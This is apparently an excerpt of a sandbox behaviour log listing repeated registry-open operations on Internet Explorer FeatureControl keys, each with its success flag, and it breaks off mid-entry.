Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING